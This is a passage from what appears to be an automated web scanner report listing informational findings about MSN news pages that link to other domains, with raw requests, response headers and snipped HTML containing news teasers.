<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345061&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>A California professor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&amp;go=&amp;form=msnpop">see photos</a>) reportedly was caught (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+urinating+and+tape&amp;form=msnpop">here...s how</a>) urinating on a colleague...s door. Officials say they became suspicious after <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+finding+urine+around+door&amp;go=&amp;form=msnpop">they found this</a> evidence and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&amp;form=msnpop">heard this talk</a>. Find out if <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+charged&amp;go=&amp;form=msnpop">he was charged</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Oakland+professor+and+stalking&amp;form=msnpop">Here...s what</a>
...[SNIP]...
<div>A Massachusetts professor has been honored by the White House. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&amp;form=msnpop">Find out who.</a>
...[SNIP]...
<div>Here...s help <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Ph.D.+programs&amp;go=&amp;form=msnpop">finding the right graduate school</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.329. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1434474df3fa4048b0561a473d97a621; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3715266A091A4098881C985F230AA4BB; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:00 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406680&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>A California professor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&amp;go=&amp;form=msnpop">see photos</a>) reportedly was caught (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+urinating+and+tape&amp;form=msnpop">here...s how</a>) urinating on a colleague...s door. Officials say they became suspicious after <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+finding+urine+around+door&amp;go=&amp;form=msnpop">they found this</a> evidence and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&amp;form=msnpop">heard this talk</a>. Find out if <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+charged&amp;go=&amp;form=msnpop">he was charged</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Oakland+professor+and+stalking&amp;form=msnpop">Here...s what</a>
...[SNIP]...
<div>A Massachusetts professor has been honored by the White House. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&amp;form=msnpop">Find out who.</a>
...[SNIP]...
<div>Here...s help <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Ph.D.+programs&amp;go=&amp;form=msnpop">finding the right graduate school</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.330. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a614ebfb7c224f3bb457b79ccdc881e7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=03724E8B3D5544EBB79EE2D27DF917E5; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406682&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+bell+fights+back&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Taco Bell is a target of a class action lawsuit aimed at the chain...s beef product. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+Bell+35%25+beef&amp;form=msnpop">What...s at issue</a>? To combat the allegations, the chain has taken out full page ads in some of the nation...s biggest newspapers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&amp;form=msnpop">what does it say</a>?) and has released a YouTube video to explain its product. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&amp;FORM=msnpop">See the video</a>
...[SNIP]...
<div>A restaurant recently got attention when it said it...d serve lion tacos. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&amp;go=&amp;form=msnpop">Get the latest</a>
...[SNIP]...
<div>In 2002 McDonald's was sued over beef in their French fries. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&amp;go=&amp;form=msnpop">How much was the settlement</a>
...[SNIP]...
<div>Is it possible to eat healthy at Taco Bell? It is. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&amp;go=&amp;form=msnpop">Find out how</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.331. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345062&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+bell+fights+back&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Taco Bell is a target of a class action lawsuit aimed at the chain...s beef product. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+Bell+35%25+beef&amp;form=msnpop">What...s at issue</a>? To combat the allegations, the chain has taken out full page ads in some of the nation...s biggest newspapers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&amp;form=msnpop">what does it say</a>?) and has released a YouTube video to explain its product. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&amp;FORM=msnpop">See the video</a>
...[SNIP]...
<div>A restaurant recently got attention when it said it...d serve lion tacos. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&amp;go=&amp;form=msnpop">Get the latest</a>
...[SNIP]...
<div>In 2002 McDonald's was sued over beef in their French fries. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&amp;go=&amp;form=msnpop">How much was the settlement</a>
...[SNIP]...
<div>Is it possible to eat healthy at Taco Bell? It is. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&amp;go=&amp;form=msnpop">Find out how</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.332. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx?cp-documentid=26967180&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afea9d1aa6b64bb89cc826008652e671; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4832BD95C2434303AACD90D820334E33; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:14 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 33298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345074&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&amp;form=msnhal"><strong>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne&amp;form=msnhal">Avril Lavigne</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=avril+lavigne&amp;qpvt=avril+lavigne&amp;FORM=msnhal">see photos</a>) is the first celebrity death hoax of 2011. The rocker is rumored to have died in a freak accident. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&amp;form=msnhal">Get the details</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.333. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx?cp-documentid=26967180&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:13 GMT
Server: Microsoft-IIS/6.0
